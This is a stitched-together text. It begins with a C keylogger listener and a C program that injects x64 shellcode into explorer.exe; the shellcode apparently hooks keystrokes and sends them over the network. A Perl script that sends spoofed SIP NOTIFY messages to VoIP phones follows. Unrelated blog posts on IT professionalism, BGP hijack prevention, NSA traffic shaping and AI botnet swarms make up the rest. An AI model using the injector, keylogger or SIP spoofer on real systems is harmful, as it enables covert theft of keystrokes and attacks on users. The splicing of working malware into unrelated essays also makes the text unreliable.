case 0x4B: key = caps ? (shift ? "k" : "K") : (shift ? "K" : "k"); break;
case 0x4C: key = caps ? (shift ? "l" : "L") : (shift ? "L" : "l"); break;
case 0x4D: key = caps ? (shift ? "m" : "M") : (shift ? "M" : "m"); break;
case 0x4E: key = caps ? (shift ? "n" : "N") : (shift ? "N" : "n"); break;
case 0x4F: key = caps ? (shift ? "o" : "O") : (shift ? "O" : "o"); break;
case 0x50: key = caps ? (shift ? "p" : "P") : (shift ? "P" : "p"); break;
case 0x51: key = caps ? (shift ? "q" : "Q") : (shift ? "Q" : "q"); break;
case 0x52: key = caps ? (shift ? "r" : "R") : (shift ? "R" : "r"); break;
case 0x53: key = caps ? (shift ? "s" : "S") : (shift ? "S" : "s"); break;
case 0x54: key = caps ? (shift ? "t" : "T") : (shift ? "T" : "t"); break;
case 0x55: key = caps ? (shift ? "u" : "U") : (shift ? "U" : "u"); break;
case 0x56: key = caps ? (shift ? "v" : "V") : (shift ? "V" : "v"); break;
case 0x57: key = caps ? (shift ? "w" : "W") : (shift ? "W" : "w"); break;
case 0x58: key = caps ? (shift ? "x" : "X") : (shift ? "X" : "x"); break;
case 0x59: key = caps ? (shift ? "y" : "Y") : (shift ? "Y" : "y"); break;
case 0x5A: key = caps ? (shift ? "z" : "Z") : (shift ? "Z" : "z"); break;
// Sleep Key
case VK_SLEEP: key = "[SLEEP]"; break;
// Num Keyboard
case VK_NUMPAD0: key = "0"; break;
case VK_NUMPAD1: key = "1"; break;
case VK_NUMPAD2 : key = "2"; break;
case VK_NUMPAD3: key = "3"; break;
case VK_NUMPAD4: key = "4"; break;
case VK_NUMPAD5: key = "5"; break;
case VK_NUMPAD6: key = "6"; break;
case VK_NUMPAD7: key = "7"; break;
case VK_NUMPAD8: key = "8"; break;
case VK_NUMPAD9: key = "9"; break;
case VK_MULTIPLY: key = "*"; break;
case VK_ADD: key = "+"; break;
case VK_SEPARATOR: key = "-"; break;
case VK_SUBTRACT: key = "-"; break;
case VK_DECIMAL: key = "."; break;
case VK_DIVIDE: key = "/"; break;
// Function Keys
case VK_F1: key = "[F1]"; break;
case VK_F2: key = "[F2]"; break;
case VK_F3: key = "[F3]"; break;
case VK_F4: key = "[F4]"; break;
case VK_F5: key = "[F5]"; break;
case VK_F6: key = "[F6]"; break;
case VK_F7: key = "[F7]"; break;
case VK_F8: key = "[F8]"; break;
case VK_F9: key = "[F9]"; break;
case VK_F10: key = "[F10]"; break;
case VK_F11: key = "[F11]"; break;
case VK_F12: key = "[F12]"; break;
case VK_F13: key = "[F13]"; break;
case VK_F14: key = "[F14]"; break;
case VK_F15: key = "[F15]"; break;
case VK_F16: key = "[F16]"; break;
case VK_F17: key = "[F17]"; break;
case VK_F18: key = "[F18]"; break;
case VK_F19: key = "[F19]"; break;
case VK_F20: key = "[F20]"; break;
case VK_F21: key = "[F22]"; break;
case VK_F22: key = "[F23]"; break;
case VK_F23: key = "[F24]"; break;
case VK_F24: key = "[F25]"; break;
// Keys
case VK_NUMLOCK: key = "[NUM-LOCK]"; break;
case VK_SCROLL: key = "[SCROLL-LOCK]"; break;
case VK_BACK: key = "[BACK]"; break;
case VK_TAB: key = "[TAB]"; break;
case VK_CLEAR: key = "[CLEAR]"; break;
case VK_RETURN: key = "[ENTER]"; break;
case VK_SHIFT: key = "[SHIFT]"; break;
case VK_CONTROL: key = "[CTRL]"; break;
case VK_MENU: key = "[ALT]"; break;
case VK_PAUSE: key = "[PAUSE]"; break;
case VK_CAPITAL: key = "[CAP-LOCK]"; break;
case VK_ESCAPE: key = "[ESC]"; break;
case VK_SPACE: key = "[SPACE]"; break;
case VK_PRIOR: key = "[PAGEUP]"; break;
case VK_NEXT: key = "[PAGEDOWN]"; break;
case VK_END: key = "[END]"; break;
case VK_HOME: key = "[HOME]"; break;
case VK_LEFT: key = "[LEFT]"; break;
case VK_UP: key = "[UP]"; break;
case VK_RIGHT: key = "[RIGHT]"; break;
case VK_DOWN: key = "[DOWN]"; break;
case VK_SELECT: key = "[SELECT]"; break;
case VK_PRINT: key = "[PRINT]"; break;
case VK_SNAPSHOT: key = "[PRTSCRN]"; break;
case VK_INSERT: key = "[INS]"; break;
case VK_DELETE: key = "[DEL]"; break;
case VK_HELP: key = "[HELP]"; break;
// Number Keys with shift
case 0x30: key = shift ? ")" : "0"; break;
case 0x31: key = shift ? "!" : "1"; break;
case 0x32: key = shift ? "@" : "2"; break;
case 0x33: key = shift ? "#" : "3"; break;
case 0x34: key = shift ? "$" : "4"; break;
case 0x35: key = shift ? "%" : "5"; break;
case 0x36: key = shift ? "^" : "6"; break;
case 0x37: key = shift ? "&" : "7"; break;
case 0x38: key = shift ? "*" : "8"; break;
case 0x39: key = shift ? "(" : "9"; break;
// Windows Keys
case VK_LWIN: key = "[WIN]"; break;
case VK_RWIN: key = "[WIN]"; break;
case VK_LSHIFT: key = "[SHIFT]"; break;
case VK_RSHIFT: key = "[SHIFT]"; break;
case VK_LCONTROL: key = "[CTRL]"; break;
case VK_RCONTROL: key = "[CTRL]"; break;
// OEM Keys with shift
case VK_OEM_1: key = shift ? ":" : ";"; break;
case VK_OEM_PLUS: key = shift ? "+" : "="; break;
case VK_OEM_COMMA: key = shift ? "<" : ","; break; case VK_OEM_MINUS: key = shift ? "_" : "-"; break; case VK_OEM_PERIOD: key = shift ? ">" : "."; break;
case VK_OEM_2: key = shift ? "?" : "/"; break;
case VK_OEM_3: key = shift ? "~" : "`"; break;
case VK_OEM_4: key = shift ? "{" : "["; break;
case VK_OEM_5: key = shift ? "|" : "\\"; break;
case VK_OEM_6: key = shift ? "}" : "]"; break;
case VK_OEM_7: key = shift ? "\"" : "'"; break; //TODO: Escape this char: "
// Action Keys
case VK_PLAY: key = "[PLAY]";break;
case VK_ZOOM: key = "[ZOOM]";break;
case VK_OEM_CLEAR: key = "[CLEAR]";break;
case VK_CANCEL: key = "[CTRL-C]";break;
default: key = "[UNK-KEY]";break;
}
return key;
}
int main()
{
int port;
SOCKET s;
struct sockaddr_in sr,cr;
WSADATA wsa;
KEYDATA keystrk;
char * n;
printf("Enter Port Number To Listen: ");
scanf("%d",&port);
if(WSAStartup(514,&wsa))
{
printf("WSAStartup() Failed");
return 0;
}
if((s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
{
printf("Failed To Create Socket...");
return 0;
}
ZeroMemory(&sr,16);
sr.sin_family=AF_INET;
sr.sin_port=htons(port);
if(bind(s,(struct sockaddr *)&sr,16))
{
printf("Failed To Bind..");
return 0;
}
port=16; //Why bother to declare a variable for int * fromlen
while(1)
{
recvfrom(s,(char *)&keystrk,8,0,(struct sockaddr *)&cr,&port);
n=Determine(keystrk.caps&0x0001,keystrk.shift>>15,keystrk.vkcode);
printf("%s",n);
}
return 0;
}
*/
#include
#include
#include
#include
char shellcode[]="\xeb\x1d\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x40\x20\x48\x8b\x30\x48\x8b\x06\x48\x8b\x70\x20\x5b\x53\xc3\xe8\xde\xff\xff\xff\x52\x52\x4c\x8d\x3c\x24\x48\x83\xec\x38\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x8d\x3c\x24\x41\x57\x41\x54\x57\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x50\x48\x31\xc0\x66\xb8\xcc\x01\x48\x01\xc3\x53\x48\x89\xf1\x48\x8d\x93\x6e\xff\xff\xff\x4d\x31\xc0\x41\xb0\x02\x49\x89\xf9\xff\xd3\x41\x5d\x48\x31\xc0\x50\x50\x48\xb8\x77\x73\x32\x5f\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x8b\x77\x08\x48\x83\xec\x28\xff\xd6\x48\x96\x48\x8d\x4c\x24\x28\xc7\x01\x75\x73\x65\x72\xff\xd0\x48\x89\xc1\x49\x8d\x55\x8c\x4d\x31\xc0\x41\xb0\x06\x4c\x8d\x4f\x10\x41\xff\xd5\x48\x89\xf1\x49\x8d\x55\xe7\x4d\x31\xc0\x41\xb0\x03\x4c\x8d\x4f\x40\x41\xff\xd5\x48\x83\xc4\x38\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x83\xc1\x6a\x48\x8d\x14\x24\x48\x8b\x5f\x40\xff\xd3\x48\x31\xc9\xb1\x02\x51\x51\x5a\x41\x58\x41\xb0\x11\x48\x8b\x5f\x48\xff\xd3\x48\x89\x47\x08\x48\x8b\x1f\x48\x31\xc9\xff\xd3\x41\xc6\x07\x02\x66\x41\xc7\x47\x02\xdb\x83\x41\xc7\x47\x04\xc1\xa1\xc1\x63\x4d\x31\xc9\x41\x51\x41\x51\x59\x5a\xb1\x0d\x49\x89\xc0\xb2\xbc\x4c\x01\xea\x48\x8b\x5f\x10\xff\xd3\x49\x8d\x4c\x24\x08\x48\x31\xd2\x52\x52\x41\x58\x41\x59\x48\x8b\x5f\x28\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x30\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x38\xff\xd3\xeb\xd4\x47\x65\x74\x4d\x6f\x64\x75\x6c\x65\x48\x61\x6e\x64\x6c\x65\x41\x01\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x01\x53\x65\x74\x57\x69\x6e\x64\x6f\x77\x73\x48\x6f\x6f\x6b\x45\x78\x41\x01\x43\x61\x6c\x6c\x4e\x65\x78\x74\x48\x6f\x6f\x6b\x45\x78\x01\x47\x65\x74\x4b\x65\x79\x53\x74\x61\x74\x65\x01\x47\x65\x74\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x54\x72\x61\x6e\x73\x6c\x61\x74\x65\x4d\x65\x73\x73\x61\x67\x65\x01\x44\x69\x73\x70\x61\x74\x63\x68\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x01\x73\x6f\x63\x6b\x65\x74\x01\x73\x65\x6e\x64\x74\x6f\x01\x56\x57\x41\x50\x52\x41\x51\x51\x41\x5b\x48\x31\xdb\x53\x53\x5a\x58\x8b\x59\x3c\x48\x01\xcb\xb2\x88\x8b\x04\x13\x48\x01\xc8\x48\x31\xd2\x52\x52\x52\x41\x58\x41\x59\x41\x5a\x44\x8b\x40\x20\x4d\x01\xd8\x44\x8b\x48\x24\x4d\x01\xd9\x44\x8b\x50\x1c\x4d\x01\xda\x48\x31\xd2\x48\x31\xf6\x56\x59\x41\x8b\x34\x90\x4c\x01\xde\x48\x8b\x7c\x24\x08\x48\x31\xc0\x8a\x04\x0f\x48\xff\xc1\x3c\x01\x75\xf6\x48\xff\xc2\x51\x48\xff\xc9\x48\x87\xf7\xf3\xa6\x59\x75\xd3\x48\xff\xca\x48\x8b\x7c\x24\x08\x48\x01\xcf\x48\x89\x7c\x24\x08\x48\x31\xdb\x53\x58\x66\x41\x8b\x1c\x51\x41\x8b\x04\x9a\x4c\x01\xd8\x48\x8b\x1c\x24\x48\x89\x03\x48\x83\xc3\x08\x48\x89\x1c\x24\x48\x8b\x5c\x24\x10\x48\xff\xcb\x48\x89\x5c\x24\x10\x48\x31\xd2\x48\x39\xd3\x75\x8e\x48\x83\xc4\x18\x5f\x5e\xc3\x48\x83\xec\x58\x41\x50\x52\x51\x48\x31\xf6\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x4c\x8b\x14\x34\x48\xff\xc6\x49\x39\xc2\x75\xf4\x48\x83\xc6\x07\x48\x8d\x1c\x34\x48\x8b\x3b\x4c\x8b\x63\x08\x4c\x8b\x7b\x10\x48\x85\xc9\x75\x68\x48\x31\xdb\xb3\x01\x48\xc1\xe3\x08\x48\x39\xda\x75\x5a\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x14\xff\xd3\x66\x41\x89\x04\x24\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x10\xff\xd3\x66\x41\x89\x44\x24\x02\x48\x8b\x5c\x24\x10\x8b\x03\x41\x89\x44\x24\x04\x48\x83\xec\x58\x48\x8b\x4f\x08\x41\x54\x5a\x4d\x31\xc9\x41\x51\x41\x58\x41\xb0\x10\x4c\x89\x7c\x24\x20\x4c\x89\x44\x24\x28\x49\x83\xe8\x08\x48\x8b\x5f\x50\xff\xd3\x48\x83\xc4\x58\x5a\x41\x58\x41\x59\x48\x8b\x5f\x18\x48\x31\xc9\xff\xd3\x48\x83\xc4\x58\xc3";
int main()
{
HANDLE s,proc;
PROCESSENTRY32 ps;
BOOL process_found=0;
LPVOID shell;
SIZE_T total;
//finding explorer.exe pid
ps.dwSize=sizeof(ps);
s=CreateToolhelp32Snapshot(2,0);
if(s==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() failed.Error code %d\n",GetLastError());
return -1;
}
if(!Process32First(s,&ps))
{
printf("Process32First() failed.Error code %d\n",GetLastError());
return -1;
}
do{
if(0==strcmp(ps.szExeFile,"explorer.exe"))
{
process_found=1;
break;
}
}while(Process32Next(s,&ps));
if(!process_found)
{
printf("Unknown Process\n");
return -1;
}
//opening process using pid
proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);
if(proc==INVALID_HANDLE_VALUE)
{
printf("OpenProcess() failed.Error code %d\n",GetLastError());
return -1;
}
//allocating memory process memory
if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)
{
printf("Failed to allocate memory into process");
CloseHandle(proc);
return -1;
}
//writing shellcode into process memory
WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);
if(sizeof(shellcode)!=total)
{
printf("Failed write shellcode into process memory");
CloseHandle(proc);
return -1;
}
//Executing shellcode
if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)
{
printf("Failed to Execute shellcode");
CloseHandle(proc);
return -1;
}
CloseHandle(proc);
CloseHandle(s);
return 0;
}
spoofed SIP status messages / no CVE assigned / origin: 2005-07-06
Multiple Vendor VoIP Phones handle spoofed SIP status messages in an improper manner. This issue could potentially lead a to a denial of service condition against a server.
The issue arises because the affected phones do not verify the 'Call-ID', 'tag' and 'branch' headers of NOTIFY messages and process spoofed status messages instead of rejecting the messages.
Cisco 7940 and 7960 and Grandstream BT 100 phones are affected by this issue. Other vendors may be vulnerable as well.
#!/usr/bin/perl
# SIP NOTIFY POC by DrFrancky@securax.org
use Socket;
SendSIPTo("10.0.0.1"); # IP of the phone
sub SendSIPTo{
$phone_ip = shift;
$MESG="NOTIFY sip:chaos\@$phone_ip:5060 SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4:5060;branch=000000000000000
From: \"drfrancky\"
To:
Contact:
Event: message-summary
Call-ID: drfrancky\@1.2.3.4
CSeq: 102 NOTIFY
Content-Type: application/simple-message-summary
Content-Length: 37
Messages-Waiting: yes
Voicemail: 3/2";
$proto = getprotobyname('udp');
socket(SOCKET, PF_INET, SOCK_DGRAM, $proto) ;
$iaddr = inet_aton("0.0.0.0");
$paddr = sockaddr_in(5060, $iaddr);
bind(SOCKET, $paddr) ;
$port=5060;
$hisiaddr = inet_aton($phone_ip) ;
$hispaddr = sockaddr_in($port, $hisiaddr);
send(SOCKET, $MESG, 0,$hispaddr ) || warn "send $host $!\n";
}
Friday, December 28, 2018
Professions are here for a reason
Thanks to Ivan Pepelnjak for the below one.
And many others as welll!
An unused knob is sometimes better than a used.
Professions are here for a reason – they enable people to do the work they’re qualified to do.Needless to say, it took him decades to fully understand its implications.
Do what you’re qualified to do. Don’t think you’re good as me at everything just because you can Google-and-paste. Figure out where your limitations are.
Seek help when you’re dealing with something beyond your comfort zone. The amount of ignorant improvisation we see in IT is stupefying. Have you ever wondered why lawyers and doctors ask for second opinion?
Yes, I know your manager expects you to know everything just because you have administrator or engineer in your job title, which just proves he never thought about the next two paragraphs.
Don’t think you understand other people’s job. I’m always amazed to watch people completely unqualified to have an opinion on a problem loudly offering it just because they’re experts in totally unrelated field. PhDs in chemistry telling IT engineers how to do their jobs would be one of my first-hand experiences.
Don’t think you could do their jobs better than they do… until you tried and proved you can succeed while facing the same constraints they have. My favorite one: an airline pilot confident he could write a program to do airline’s crew scheduling (which is probably an NP-hard problem) on Commodore-64.
Having said all that, do your job well if you want to earn and retain the trust of your peers. If you’re obviously clueless or randomly throwing fixes at the problem trying to figure out which one might stick don’t be surprised when everyone else starts acting in ways I described above.
Accept help (courtesy of Chris Young). When a grey-beard gives you a piece of advice - LISTEN. Doesn’t mean you have to accept it as truth or obey their commands, but watching people new to the profession make the same mistakes we all made 20 years ago because they didn’t heed the warning is frustrating…
And “I told you so” doesn’t fix the network or the harm that major network outages cause to our reputation as a profession.
APT10 investigation + US Cert Warning
https://www.us-cert.gov/china
Operation Cloud Hopper:
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
Japan Google's Verizon route-leaking private setups to the world:
https://bgpmon.net/bgp-leak-causing-internet-outages-in-japan-and-beyond/
Widespread outages, particularly in Japan (OCN) were because of the more specifics, causing many networks to reroute traffic toward verizon and Google which likely would have congested that path or perhaps hit some kind of acl, resulting in the outages.
----------------------------------------------------------
https://foreignminister.gov.au/releases/Pages/2018/mp_mr_181221.aspx
https://securityintelligence.com/think-your-network-is-safe-if-you-dont-have-visibility-into-hardware-vulnerabilities-think-again/
https://www.terraform.io/downloads.html
https://securityintelligence.com/how-open-source-intelligence-could-save-your-network/
https://securityintelligence.com/ibm-x-force-security-predictions-for-the-2019-cybercrime-threat-landscape/
-----------------------------------------------------------
Enterprises asking ISPs "How do you Protect us from BGP Hijacks?"
Think of the consequences as you go through the BGP "Hijacking" Risk Reduction questions. First, these questions should not be a surprise with Telcom and ISPs around the world. They are legitimate questions with is part of the service you are buying from your providers. Second, they often become the "justification" for the staff in the ISP to take action. "We have five top customers all ask us about BGP security. Boss, we think it is time to take action." Finally, the simple BGP Hijack Security dialog will put everyone on a watchful stance. People will notice when someone tries to deploy a BGP Hijack. The industry decreases its response time to these hijacks all because CxOs in Enterprise network around the world is asking the question ..... "How are we protecting ourselves from BGP HijacksSaturday, December 8, 2018
BGP hijack prevention
- IRR Power Tools (IRRPT) https://github.com/6connect/irrpt
- Internet Routing Registry Toolset (IRRToolset) https://github.com/irrtoolset/irrtoolset
- BGPQ3 https://github.com/snar/bgpq3
- Ansible http://www.ansible.com/
- Cisco Network Services Orchestrator http://www.cisco.com/go/nso
- IRR Explorer http://irrexplorer.nlnog.net/
Congressional and judicial limitations come into play only when that raw Internet traffic is used to “intentionally target a U.S. person,” a legal notion that is narrowly interpreted to exclude the bulk collection, storage, and even certain types of computerized data analysis.8
This is a crucial issue, because American data are routed across foreign communications cables. Several leading thinkers,9 including Jennifer Granick in her recent report for The Century Foundation, have drawn attention to the creeping risk of domestic surveillance that is conducted from afar.
This report describes a novel and more disturbing set of risks. As a technical matter, the NSA does not have to wait for domestic communications to naturally turn up abroad.
In fact, the agency has technical methods that can be used to deliberately reroute Internet communications. The NSA uses the term “traffic shaping” to describe any technical means the deliberately reroutes Internet traffic to a location that is better suited, operationally, to surveillance.
Since it is hard to intercept Yemen’s international communications from inside Yemen itself, the agency might try to “shape” the traffic so that it passes through friendly communications cables located on friendlier territory.10
Think of it as diverting part of a river to a location from which it is easier (or more legal) to catch fish.
The NSA has clandestine means of diverting portions of the river of Internet traffic that travels on global communications cables.
If, for example, the Federal Bureau of Investigations (FBI) wants to monitor electronic communications between two Americans as part of a criminal investigation, it is required by law to obtain a warrant.12
If the intelligence community wants to intercept Americans’ communications inside the United States, for national security reasons, then it must follow rules established by the Foreign Intelligence Surveillance Act (FISA).13
Meanwhile, when the intelligence community wants to intercept traffic abroad, its surveillance is mostly regulated by Executive Order 12333 (EO 12333),14 issued by Ronald Reagan in 1981.15
Surveillance programs conducted under FISA are subject to oversight by the FISA Court and regular review by the intelligence committees in Congress.
Meanwhile, surveillance programs under EO 12333 are largely unchecked by either the legislative16 or judicial branch. EO 12333 programs are conducted entirely under the authority of the president.
The narrow interpretation of “targeting” has significant implications on privacy for U.S. persons. For instance, the NSA has built a “search engine”44 that allows analysts to hunt through raw data collected in bulk through various means. If a human analyst uses that search engine to search for communications linked to a specific email address, Facebook username, or other personal identifier—a “selector”45—then that counts as “intentional targeting.”
However, if an analyst obtains information using search terms that do not implicate a single individual—for example, words or phrases such as “Yemen” or “nuclear proliferation”—the communications swept up as part of this search, such as an email between two Americans discussing current events in Yemen, are not considered to be “intentionally targeted.”46 Instead, these communications are merely “incidentally collected.”47
U.S. surveillance techniques are classified, which prevents outside observers from making categorical statements about how far the intelligence community stretches this notion of “incidental collection.”
It can sometimes be faster or cheaper for Internet service providers (ISP) to send traffic through a foreign country. The United States has a well-connected communications infrastructure, so it is rare to find a case where traffic sent between two domestic computers naturally travels through a foreign country.
Nevertheless, these cases do occur. One such case (identified by Dyn Research’s Internet measurement infrastructure) is presented below
(Figure 1)
The “traceroute” presented below shows how Internet traffic sent between two domestic computers travels through foreign territory. The traffic originates at a computer in San Jose and is routed through Frankfurt before arriving at its final destination in New York. The left column shows the Internet Protocol (IP) address of each Internet device on the route, the middle column names the Internet Service Provider (ISP) that owns this device, and the right column shows the location of the device.
Replicating U.S.-based data in foreign data centers is a common industry practice, in order to ensure that data can be recovered even in the face of local disasters (power outages, earthquakes, and so on).53 Google, for instance, maintains data centers in the United States, Taiwan, Singapore, Chile, Ireland, the Netherlands, Finland, and Belgium, and its privacy policy states: “Google processes personal information on our servers in many countries around the world. We may process your personal information on a server located outside the country where you live.”54 If two Americans use their Google accounts to communicate, their emails and chat logs may be backed up on Google’s data centers abroad, and thus can be “incidentally collected” as part of EO 12333 surveillance.
Traffic Shaping by “Port Mirroring” at Hacked Routers
It has been reported that the NSA already employs a technique to “shape” traffic so that it travels through a tapped communication cable. The traffic-shaping technique involves hacking into an Internet infrastructure device, for example, a router. A router is a device that forwards Internet traffic to its destination.73 In Figure 3, which was hand-drawn by a hacker employed by the NSA and later leaked, the hacked device74 is called a “CNE midpoint.”75“Electronic surveillance”
is a legal term that is defined the FISA statute; in fact, despite several amendments, FISA’s definition of “electronic surveillance” remains largely unchanged from its original 1978 version. The FISA definition of “electronic surveillance” has two clauses that could be potentially cover hacking into a U.S. router and instructing it to perform traffic shaping via port-mirroring.
One clause in the FISA statute defines “electronic surveillance” to be
Another clause in the FISA statute defines “electronic surveillance” as
This clause covers the “acquisition” of communications inside the United States. However, one could argue that communications are not “acquired” when a U.S. router is hacked and instructed to perform port mirroring. The hacked router is merely instructed to copy traffic and pass it along, but not to read, store, or analyze it. Therefore, “acquisition” occurs at the tapped communication cable (abroad) rather than at the hacked router (inside the United States). As such, this clause is also not relevant.84
The intelligence community does not have to hack into routers or use other clandestine techniques to shape traffic—it could simply ask the corporations that own those routers to provide access, or shape the traffic themselves. A document leaked by Edward Snowden suggests that the NSA has done this through its FAIRVIEW program.
(FAIRVIEW was revealed to be a code name for AT&T100). The document states:
There is no evidence that the FAIRVIEW program is being used to shape traffic from inside the United States to foreign communications cables. But it is worth noting that, with the cooperation of corporations such as AT&T, traffic could easily be shaped to a collection point abroad without the need to hack into any routers, thus obviating many of the legal questions previously discussed.
Modern networking protocols and technologies can be manipulated in order to shape Internet traffic from inside the United States toward tapped communications cables located abroad. It is possible that traffic shaping is regulated by EO 12333, and not by FISA,102 since the techniques shape traffic in bulk, in a way that does not “intentionally target” any specific individual or organization.
Moreover, while FISA covers the “acquisition” of Internet traffic on U.S. territory, but the traffic shaping methods discussed merely move traffic around, but do not read, store, analyze, or otherwise “acquire” it. Instead, acquisition is performed on foreign soil, at the tapped communication cable. Finally, while the Fourth Amendment may require a warrant for hacking U.S. routers, the warrant requirement could be avoided by performing traffic shaping with the consent of corporations that own the routers (e.g. via the FAIRVIEW program), or by hacking foreign routers (and then using BGP manipulations).
Technical Solutions Will Not Work
One might be tempted to eliminate these loopholes via technical solutions. For instance, traffic shaping could be made more difficult by designing routers that are “unhackable,” and Internet protocols could be made secure against traffic-shaping manipulations. Or the confidentiality of traffic could be protected just by encrypting everything.While this approach sounds good in theory, in practice it is unlikely to work.
First, it is highly unlikely that we will ever have Internet infrastructure devices (e.g. routers) that cannot be hacked. Router software is complicated, and even the best attempt at an “unhackable” router is likely to contain bugs.104 Intelligence agencies have dedicated resources to finding and using these bugs to hack into routers.105 And even if we somehow manage to create bug-free router software, the intelligence community has been known to physically intercept routers as they ship in the mail, and tamper with their hardware.106
Second, it will take many years to develop and implement secure Internet protocols that prevent traffic shaping. A key challenge is that the Internet is a global system, one that transcends organizational and national boundaries. Deploying a secure Internet protocol requires cooperation from thousands of independent organizations in different nations. This is further complicated by the fact that many secure Internet protocols do not work well when they are used only by a small number of networks.107
Finally, while encryption can be used to hide the contents of Internet traffic, it does not hide metadata (that is, who is talking to whom, when they are talking, and for how long). Metadata is both incredibly revealing, and less protected by the law.108 Intelligence agencies have also dedicated resources toward compromising encryption.109 Moreover, EO 12333 allows the NSA to retain encrypted communications indefinitely.110 This is significant because the technology used to break encryption tends to improve over time—a message that was encrypted in the past could be decryptable in the future, as technology improves.111
This is not to say that technical solutions are unimportant. On the contrary, they are crucial, especially because they protect American’s traffic from snoopers, criminals, foreign intelligence services, and other entities that do not obey American laws. Nevertheless, technologies evolve at a rapid pace, so solving the problem using technology would be a continuous struggle.
It is much more sensible to realign the legal framework governing surveillance to encompass the technologies, capabilities, and practices of today and of the future.
Friday, November 30, 2018
AI and CDN used in Network Exploitation & Attacks (Pt.3)
[https://threatpost.com/newsmaker-interview-derek-manky-on-self-organizing-botnet-swarms/136936/]
For over five years Derek Manky, global security strategist at Fortinet and FortiGuard Labs, has been helping the private and public sector identify and fight cybercrime. His job also includes working with noted groups: Computer Emergency Response, NATO NICP, INTERPOL Expert Working Group and the Cyber Threat Alliance.
Recently Threatpost caught up with Manky to discuss the latest developments around his research on botnet “swarm intelligence.” That’s a technique where criminals enlist artificial intelligence (AI) inside botnet nodes. Those nodes are then programmed to work toward a common goal of bolstering an attack chain and accelerating the time it takes to breach an organization.
Threatpost: What are “self-organized botnet swarms?”
Manky: What we are starting to see [are] humans, such as the black-hat hackers, being taken out of the attack cycle more and more. Why? Because humans are slow by nature compared to machines.
Swarms accelerate the attack chain – or attack cycle. They help attackers move fast. Over time, as defenses improve, the window of time for an attack is shrinking. This is a way for attackers to make up for that lost time.
A self-learning swarm is a cluster of compromised devices that leverage peer-based AI to target vulnerable systems. Traditional botnets wait for commands from a bot herder. Swarms are able to make decisions independently. They can identify and assault – or swarm – different attack vectors all at once.
TP: What type of botnets are we talking about here? Botnets used for crippling a network? Where is this technology seen today?
Manky: Hide and Seek is a recent botnet that we have seen with the swarm technology in it.
TP: So, what makes Hide and Seek unique?
Manky: Typically a botnet will receive a command from the attacker, right? They go DDoS the target or try to exfiltrate information. But what we are starting to see with these new peer-to-peer botnets is they are able to share those commands – between botnet nodes – and act on their own without an attacker issuing any commands.
TP: Is this machine intelligence? And, what is it that these botnets are trying to learn from and execute?
Manky: They are collecting data. They are trying to learn information about potential attack targets – that is, exploits and weaknesses that they can launch a successful attack against. They are trying to pinpoint vulnerabilities or holes that they can actually go and launch a successful exploit against. They are looking for a penetration weakness – something they can send payload to. Once they find it, the node can let the rest of the botnet nodes know.
TP: Can you break this down into a likely scenario?
Manky: We’re starting to see this in the world of IoT. A hypothetical situation includes a network where there is a barrier – a network firewall, or policies. On the network is a printer, network attached storage, an IP security camera and a database. Then, for whatever reason, the IP security camera is on the same network segment as database. Now [the attack] can target the printer and infect the network attached storage, which infects the camera. Now the camera can be used as a proxy to gather intelligence.
That intelligence is shared between the nodes. It’s a structured command list where it can say “send me a list of targets that you know, have this within the network segment – along with intelligence on that segment.” And then – when the network configurations match – the nodes can swarm and request the exfiltration of data and launch more attacks.
TP: Is there anything that is unique about the size or agility of these botnets? Does this “intelligence” allow it to be more efficient and smaller?
Manky: Swarms are large by nature. But I would call them first, efficient. Traditional botnets are monolithic. Bot-herders typically rent a botnet out just to [launch] a DDoS attack or just to launch a phishing attack. But with swarms, they have the capability to spin up resources – similar to virtual machines.
Bot-herders can say, “I want 20 percent of this botnet doing DDoS. I want 30 percent doing phishing campaigns.” It’s more about monetization, efficiency and being fast.
TP: When you say “swarms,” can you give me a sense of what you exactly mean by that?
Manky: The best example is what we see in nature – such as birds, bees and ants. When ants communicate they use pheromones between each other. The pheromones mark the shortest path to bring back food to the nest. Ants, in this scenario, aren’t taking orders from the queen ant. They are acting on their own.
Now the same concept is being applied to botnet code. What we are seeing are precursors of this right now. Hide and Seek has the code, but isn’t using it yet.
Hide and Seek is a decentralized IoT botnet. The capabilities are in the code, but we are still waiting for the first full-blown attack using this technique.
I expect to see a lot more of this technology in 2019.
TP: Where does that leave us on the defense side of the equation?
Manky: It really needs to redefine the network security center. We are going to need more automated tools. It’s going to come down to AI versus AI. We need better security postures that are capable of actually detecting and acting on their own as well.
If you are up against a swarm, it’s very fast by nature. It can already breach a target, by the time a human administrator can detect it. For that reason, the network intelligence needs to be able to understand what it is seeing and be able to act on it.
At a higher level, it comes down to quality of intelligence and how much you trust your
CDN and AI in Network Exploitation (Pt.2)
In many ways this migration to the cloud mirrors that of legitimate businesses.
It is much less financially advantageous for attackers to maintain large botnets and maintain the knowledge and expertise needed to avoid detection and grow the bot. The fact that it is much easier to pay somebody else to maintain these things and simply rent time should sound very familiar to anybody that uses a cloud service application like Salesforce or Oracle. The advantages for the attackers are very similar to the advantages gained by a legitimate business. Attackers can offer chunks of their botnet or attack infrastructure for sale. They can gain more money, usually bitcoins, by segmenting their entire bot and selling time on it individually.
